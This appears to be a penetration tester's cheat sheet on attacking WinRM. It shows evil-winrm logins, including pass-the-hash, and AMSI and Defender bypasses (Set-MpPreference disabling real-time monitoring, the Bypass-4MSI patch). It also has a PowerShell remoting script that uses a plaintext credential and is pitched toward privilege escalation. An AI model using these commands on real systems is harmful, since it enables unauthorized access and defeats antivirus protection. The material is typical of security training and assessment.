5985,5986 - WinRM
Authentication
evil-winrm -i <ip> -u <user> -p <pass>          # password
evil-winrm -i <ip> -u <user> -H <hash>          # NTLM hash (pass-the-hash)
# -S -> SSL (5986 listener)
evil-winrm -i 10.10.11.152 -S -k <key> -c <crt>  # SSL with client certificate
AMSI Bypass
> #amsiscanbuffer
At line:1 char:1
+ #amsiscanbuffer
+ ~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software.
# Try this as well (needs admin rights; disables Defender real-time scanning)
> Set-MpPreference -DisableRealtimeMonitoring $true
Try AMSI.fail.
# evil-winrm has a built-in patch; after it the same test string is no longer blocked
> Bypass-4MSI
Info: Patching 4MSI, please be patient...
[+] Success!
> #amsiscanbuffer
PowerShell Remoting
PowerShell Remoting uses WinRM by default for cmdlets such as Enter-PSSession and Invoke-Command. A user therefore needs WinRM access on the target, which by default means membership in the local Administrators group or the Remote Management Users group; the latter is the one to look for when a non-admin account unexpectedly works. SSH can be used as the transport instead of WinRM.
Creating an interactive PowerShell remoting session via WinRM from inside a bind shell can cause unexpected behavior. Opt for evil-winrm instead.
> $password = ConvertTo-SecureString "qwertqwertqwert123!!" -AsPlainText -Force
> $cred = New-Object System.Management.Automation.PSCredential("daveadmin", $password)
> Enter-PSSession -ComputerName CLIENTWK220 -Credential $cred
[CLIENTWK220]: PS C:\Users\daveadmin\Documents> whoami
whoami
clientwk220\daveadmin
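Scripting the same access rather than typing into Enter-PSSession, as an added example that is not part of the original notes: it reuses the host name, account and password from the session above as placeholders, and assumes Test-NetConnection and Get-LocalGroupMember are available (Windows 10 / Server 2016 or later). It checks which listener is open, builds a reusable session, and reports on the target which of the two default WinRM-granting groups actually contain the account.

```powershell
# Added example (not from the original notes): script a WinRM session instead of
# typing into Enter-PSSession. Host, user and password are placeholders reused
# from the session above; adjust to the target.
$target   = 'CLIENTWK220'
$userName = 'daveadmin'
$password = ConvertTo-SecureString 'qwertqwertqwert123!!' -AsPlainText -Force
$cred     = New-Object System.Management.Automation.PSCredential($userName, $password)

# 1. Which WinRM listener is reachable: 5985 is HTTP, 5986 is HTTPS
foreach ($port in 5985, 5986) {
    $tcp = Test-NetConnection -ComputerName $target -Port $port -WarningAction SilentlyContinue
    '{0}:{1} open={2}' -f $target, $port, $tcp.TcpTestSucceeded
}

# 2. Open one reusable session; add -UseSSL to talk to the 5986 listener instead
$session = New-PSSession -ComputerName $target -Credential $cred -ErrorAction Stop

# 3. On the target, report the effective identity and which of the two groups
#    that grant WinRM access by default (Administrators, Remote Management Users)
#    contain this account. Membership is compared by SID against the token's
#    group list, so nested membership via a domain group is detected as well.
$whoami = Invoke-Command -Session $session -ScriptBlock {
    $id   = [Security.Principal.WindowsIdentity]::GetCurrent()
    $sids = @($id.Groups.Value) + $id.User.Value
    $inGroup = {
        param($group)
        $members = Get-LocalGroupMember -Group $group -ErrorAction SilentlyContinue
        [bool]($members | Where-Object { $sids -contains $_.SID.Value })
    }
    [pscustomobject]@{
        User                  = $id.Name
        Administrators        = & $inGroup 'Administrators'
        RemoteManagementUsers = & $inGroup 'Remote Management Users'
    }
}
$whoami | Format-List

# 4. Run any further commands in the same session, then tear it down
Invoke-Command -Session $session -ScriptBlock { hostname; whoami /groups }
Remove-PSSession $session

# SSH transport instead of WinRM (PowerShell 7 on both ends, sshd on the target):
# Enter-PSSession -HostName $target -UserName $userName
```

If both group checks come back False but the session still opened, the account was granted WinRM access some other way (a custom session configuration ACL, for example), which is worth noting for privilege escalation later.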